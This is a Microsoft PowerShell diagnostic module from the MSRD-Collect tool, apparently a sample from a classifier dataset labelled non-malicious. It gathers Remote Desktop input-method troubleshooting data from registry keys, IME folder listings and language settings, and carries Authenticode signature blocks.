7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtcwggJAAgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpG # QzQxLTRCRDQtRDIyMDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAFpuZafp0bnpJdIhfiB1d8pTohm+ggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOnKCdAwIhgPMjAyNDA0MTcxNjQxNTJaGA8yMDI0MDQxODE2NDE1MlowdzA9Bgor # BgEEAYRZCgQBMS8wLTAKAgUA6coJ0AIBADAKAgEAAgIkDQIB/zAHAgEAAgI5kjAK # AgUA6ctbUAIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIB # AAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAEC90VKrhbjkNrXv # 8cERX5mm1eKgl7MOJe9ne7CV9Jy8IURTZWik2IeRQxkFNz/bhGGdLT8DtaESdsEl # yx5jWElRkn2eVe9or0FuEh2XfDjAnCZHYVVMIXdWPQvJJYu36sOLuZXfzglgA0Wr # daN5sG+BY7V3EjJr9OlLs6TNQte/MYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJYIZIAWUD # BAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0B # CQQxIgQgdnWedaIk3QxfqMmztchvHR4NDk385guXQwWZ1v+IBcEwgfoGCyqGSIb3 # DQEJEAIvMYHqMIHnMIHkMIG9BCAriSpKEP0muMbBUETODoL4d5LU6I/bjucIZkOJ # CI9//zCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB # 4pmZlfHc4yDrAAEAAAHiMCIEIDFBtS6JloGJnDFsEbVQdmrdMsNcoZTNGJV9qV0Z # T99tMA0GCSqGSIb3DQEBCwUABIICAKMEA2TjPxHIdfP37PZGLeTbLYFux0UsOXA2 # 9SEiFq/T9c9LOHFXCkVFMzoiI3RAO/37FysCeWo8XTo+Kta62TxO1uzS5W7jyw3q # jLwBtBkV1I9nLmOXxUQhLyqtNlaXypGw+DFysuXhZwpSBFAZbAOn+i+TzwKFlodt # Bu1C+kBN1g/T0k3IFb8/yI4CHNDKbKr5I784uDAPdMGuQOv66P/uhHnssdJ4ywGm # xjN/K52tK2+oEyFGNZj/P2Mxm36KZ059AITya/wtg7d9IydklKFRM+TcvbAyztfz # ECmzg1AqbQ0Nc8ilzMlRj7242J9GQ1ifjU22Wit5pS307IRJf8n6CbKqby2xRhTc # xOyAp7/WASSFjdBmMroAW7F9vNPP3cOyg67lvh34WwS1HA/vsiv7vJQUEARQXi7H # Oo9Xavy1xoLRcjXDDZV1mJPgkVLBg6a9266wDhwXivnv2Ywcu3zmbeoOI+I5wEW3 # yhcMo0gD+1hZlXj3mNLhAj+EW0B7xqeVdKP4UxztzvTa9SDFznNRGv2P2FE0S5TP # zRCZZCtuVAIIvdxTjIbFc+E+lIhoMwKYr/uZmbe0j3/lJx9htRNJxe7l1SY7+Df4 # hUHWhBwWp5XLTPi3cs07WfVDGe0iZqiBASWfZXTtdi1wBScQ3/iUKTsdiz1tdgiu # BW6aMuw0 # SIG # End signature block
combined_dataset/train/non-malicious/sample_61_6.ps1
sample_61_6.ps1
<# .SYNOPSIS Scenario module for collecting Microsoft Remote Desktop input method related data .DESCRIPTION Collect input method related troubleshooting data .NOTES Author : Robert Klemencz Requires : MSRD-Collect.ps1 Version : See MSRD-Collect.ps1 version Feedback : https://aka.ms/MSRD-Collect-Feedback #> $msrdLogPrefix = "IME" $msrdIMELogFolder = $global:msrdBasicLogFolder + "IME\" Function msrdGetIMERegKeys { msrdCreateLogFolder $global:msrdRegLogFolder $regs = @{ 'HKCU:\Control Panel\International' = 'CtrlPanel-International' 'HKCU:\Keyboard Layout' = 'KeyboardLayout' 'HKCU:\SOFTWARE\AppDataLow\Software\Microsoft\IME' = 'SW-AppDataLow-SW-MS-IME' 'HKCU:\SOFTWARE\Microsoft\CTF' = 'SW-MS-CTF' 'HKLM:\SOFTWARE\Microsoft\CTF' = 'SW-MS-CTF' 'HKCU:\SOFTWARE\Microsoft\IME' = 'SW-MS-IME' 'HKLM:\SOFTWARE\Microsoft\IME' = 'SW-MS-IME' 'HKCU:\SOFTWARE\Microsoft\IMEMIP' = 'SW-MS-IMEMIP' 'HKCU:\SOFTWARE\Microsoft\IMEJP' = 'SW-MS-IMEJP' 'HKLM:\SOFTWARE\Microsoft\IMEJP' = 'SW-MS-IMEJP' 'HKLM:\SOFTWARE\Microsoft\IMEKR' = 'SW-MS-IMEKR' 'HKLM:\SOFTWARE\Microsoft\IMETC' = 'SW-MS-IMETC' 'HKCU:\SOFTWARE\Microsoft\Input' = 'SW-MS-Input' 'HKLM:\SOFTWARE\Microsoft\Input' = 'SW-MS-Input' 'HKCU:\SOFTWARE\Microsoft\InputMethod' = 'SW-MS-InputMethod' 'HKLM:\SOFTWARE\Microsoft\InputMethod' = 'SW-MS-InputMethod' 'HKCU:\SOFTWARE\Microsoft\Keyboard' = 'SW-MS-Keyboard' 'HKLM:\SOFTWARE\Microsoft\MTF' = 'SW-MS-MTF' 'HKLM:\SOFTWARE\Microsoft\MTFFuzzyFactors' = 'SW-MS-MTFFuzzyFactors' 'HKLM:\SOFTWARE\Microsoft\MTFInputType' = 'SW-MS-MTFInputType' 'HKLM:\SOFTWARE\Microsoft\MTFKeyboardMappings' = 'SW-MS-MTFKeyboardMappings' 'HKCU:\SOFTWARE\Microsoft\Speech' = 'SW-MS-Speech' 'HKLM:\SOFTWARE\Microsoft\Speech' = 'SW-MS-Speech' 'HKCU:\SOFTWARE\Microsoft\Speech Virtual' = 'SW-MS-Speech_Virtual' 'HKCU:\SOFTWARE\Microsoft\Speech_OneCore' = 'SW-MS-Speech_OneCore' 'HKLM:\SOFTWARE\Microsoft\Speech_OneCore' = 'SW-MS-Speech_OneCore' 'HKCU:\SOFTWARE\Microsoft\Spelling' = 'SW-MS-Spelling' 'HKLM:\SOFTWARE\Microsoft\Spelling' = 'SW-MS-Spelling' 'HKLM:\SYSTEM\Keyboard Layout' = 'System-KeyboardLayout' 'HKLM:\SYSTEM\CurrentControlSet\Control\Keyboard Layouts' = 'System-CCS-Control-KeyboardLayouts' } msrdGetRegKeys -LogPrefix $msrdLogPrefix -RegHashtable $regs } Function msrdGetIMETree { $msrdUserProfilesDir = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" -Name ProfilesDirectory).ProfilesDirectory $treeIME = "$msrdUserProfilesDir\$global:msrdUserprof\AppData\Roaming\Microsoft\IME" $treeInputMethod = "$msrdUserProfilesDir\$global:msrdUserprof\AppData\Roaming\Microsoft\InputMethod" $treeLocalIME = "$msrdUserProfilesDir\$global:msrdUserprof\AppData\Local\Microsoft\IME" $Commands = @( "tree $treeIME /f 2>&1 | Out-File -Append '" + $msrdIMELogFolder + $global:msrdLogFilePrefix + "tree_APPDATA-MS-IME.txt'" "tree $treeInputMethod /f 2>&1 | Out-File -Append '" + $msrdIMELogFolder + $global:msrdLogFilePrefix + "tree_APPDATA-MS-InputMethod.txt'" "tree $treeLocalIME /f 2>&1 | Out-File -Append '" + $msrdIMELogFolder + $global:msrdLogFilePrefix + "tree_LOCALAPPDATA-MS-IME.txt'" "tree '$env:windir\System32\IME' /f 2>&1 | Out-File -Append '" + $msrdIMELogFolder + $global:msrdLogFilePrefix + "tree_Win-Sys32-IME.txt'" "tree '$env:windir\IME' /f 2>&1 | Out-File -Append '" + $msrdIMELogFolder + $global:msrdLogFilePrefix + "tree_Win-IME.txt'" ) msrdRunCommands -LogPrefix $msrdLogPrefix -CmdletArray $Commands -ThrowException:$False -ShowMessage:$True -ShowError:$True } # Collecting Input Method troubleshooting data Function msrdCollectUEX_AVDIMELog { param( [bool[]]$varsIME ) if ($global:msrdSilentMode -eq 1) { msrdLogMessage $LogLevel.Normal "`n" -NoDate } else { " " | Out-File -Append $global:msrdOutputLogFile } msrdLogMessage $LogLevel.Info "$(msrdGetLocalizedText "imemsg")" -silentException if ($global:msrdAudioAssistMode -eq 1) { msrdLogMessageAssistMode "$(msrdGetLocalizedText "imemsg")" } msrdCreateLogFolder $msrdIMELogFolder if ($varsIME[0]) { msrdGetIMERegKeys } #get reg keys if ($varsIME[1]) { msrdGetIMETree } #get tree output if ($varsIME[2]) { $Commands = @( "Get-Culture | fl * 2>&1 | Out-File -Append '" + $msrdIMELogFolder + $global:msrdLogFilePrefix + "Culture.txt'" "Get-WinUserLanguageList | fl * 2>&1 | Out-File -Append '" + $msrdIMELogFolder + $global:msrdLogFilePrefix + "WinUserLanguageList.txt'" ) msrdRunCommands -LogPrefix $msrdLogPrefix -CmdletArray $Commands -ThrowException:$False -ShowMessage:$True -ShowError:$True } #culture and language } Export-ModuleMember -Function msrdCollectUEX_AVDIMELog # SIG # Begin signature block # MIIoQwYJKoZIhvcNAQcCoIIoNDCCKDACAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDNQgCyFnQqbWTY # Ukq4ol4OpCG7flyVMtfs5nJRiK8pjKCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGiMwghofAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIHVD1MUS/d8K18lKcYo75o8c # dXHWxSwiL1jNTA8XdB4sMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAl6xy3aNnyHLn8BBYPcoihdfm4cDOQ2NwgZaagvLjUUrxm7t0Hd4Esd/J # Z1DMlBMK2tuIRQerZKuak6whWlPS7feyxQWuxIP4PnWPcdv6EqNefLs8IYpAM7d5 # KHtTCoFU8omVVhO4vNgv+xQcec4eQ8ESO+ruP+k5EMKAeg7N3HVdUTBX8gZc+rF+ # byDshhaXYsz4V9aWg0BBmvs4ZCrZONEp78AwJ3L7B0NXYXNiNTnKbDghbji/Qpuh # x4Wjj6fTGVTan5pRh1kVzrBy2pvfMFa+pTmvbItqUhKubpXK4CPS3NtvY8JH3Bv8 # AX94WllgtwDKWsbrw+eLqae9M+v8r6GCF60wghepBgorBgEEAYI3AwMBMYIXmTCC # F5UGCSqGSIb3DQEHAqCCF4YwgheCAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFaBgsq # hkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCCAy5mHq2tnzyYu4roKTF/gL8zKMnPm+HD/AD+ptDyrJgIGZsY19MF4 # GBMyMDI0MDgyOTE2MTMwNC40MjFaMASAAgH0oIHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # Tjo2QjA1LTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaCCEfswggcoMIIFEKADAgECAhMzAAAB9oMvJmpUXSLBAAEAAAH2MA0G # CSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTI0 # MDcyNTE4MzEwNFoXDTI1MTAyMjE4MzEwNFowgdMxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9w # ZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjZCMDUt # MDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNl # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA0UJeLMR/N9WPBZhuKVFF # +eWJZ68Wujdj4X6JR05cxO5CepNXo17rVazwWLkm5AjaVh19ZVjDChHzimxsoaXx # Nu8IDggKwpXvpAAItv4Ux50e9S2uVwfKv57p9JKG+Q7VONShujl1NCMkcgSrPdmd # /8zcsmhzcNobLomrCAIORZ8IwhYy4siVQlf1NKhlyAzmkWJD0N+60IiogFBzg3yI # SsvroOx0x1xSi2PiRIQlTXE74MggZDIDKqH/hb9FT2kK/nV/aXjuo9LMrrRmn44o # YYADe/rO95F+SG3uuuhf+H4IriXr0h9ptA6SwHJPS2VmbNWCjQWq5G4YkrcqbPMa # x7vNXUwu7T65E8fFPd1IuE9RsG4TMAV7XkXBopmPNfvL0hjxg44kpQn384V46o+z # dQqy5K9dDlWm/J6vZtp5yA1PyD3w+HbGubS0niEQ1L6wGOrPfzIm0FdOn+xFo48E # Rl+Fxw/3OvXM5CY1EqnzEznPjzJc7OJwhJVR3VQDHjBcEFTOvS9E0diNu1eocw+Z # Ckz4Pu/oQv+gqU+bfxL8e7PFktfRDlM6FyOzjP4zuI25gD8tO9zJg6g6fRpaZc43 # 9mAbkl3zCVzTLDgchv6SxQajJtvvoQaZxQf0tRiPcbr2HWfMoqqd9uiQ0hTUEhG4 # 4FBSTeUPZeEenRCWadCW4G8CAwEAAaOCAUkwggFFMB0GA1UdDgQWBBRIwZsJuOcJ # fScPWcXZuBA4B89K8jAfBgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBf # BgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmww # bAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8vd3d3Lm1pY3Jvc29m # dC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0El # MjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUF # BwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAgEA13kBirH1cHu1 # WYR1ysj125omGtQ0PaQkEzwGb70xtqSoI+svQihsgdTYxaPfp2IVFdgjaMaBi81w # B8/nu866FfFKKdhdp3wnMZ91PpP4Ooe7Ncf6qICkgSuwgdIdQvqE0h8VQ5QW5sDV # 4Q0Jnj4f7KHYx4NiM8C4jTw8SQtsuxWiTH2Hikf3QYB71a7dB9zgHOkW0hgUEeWO # 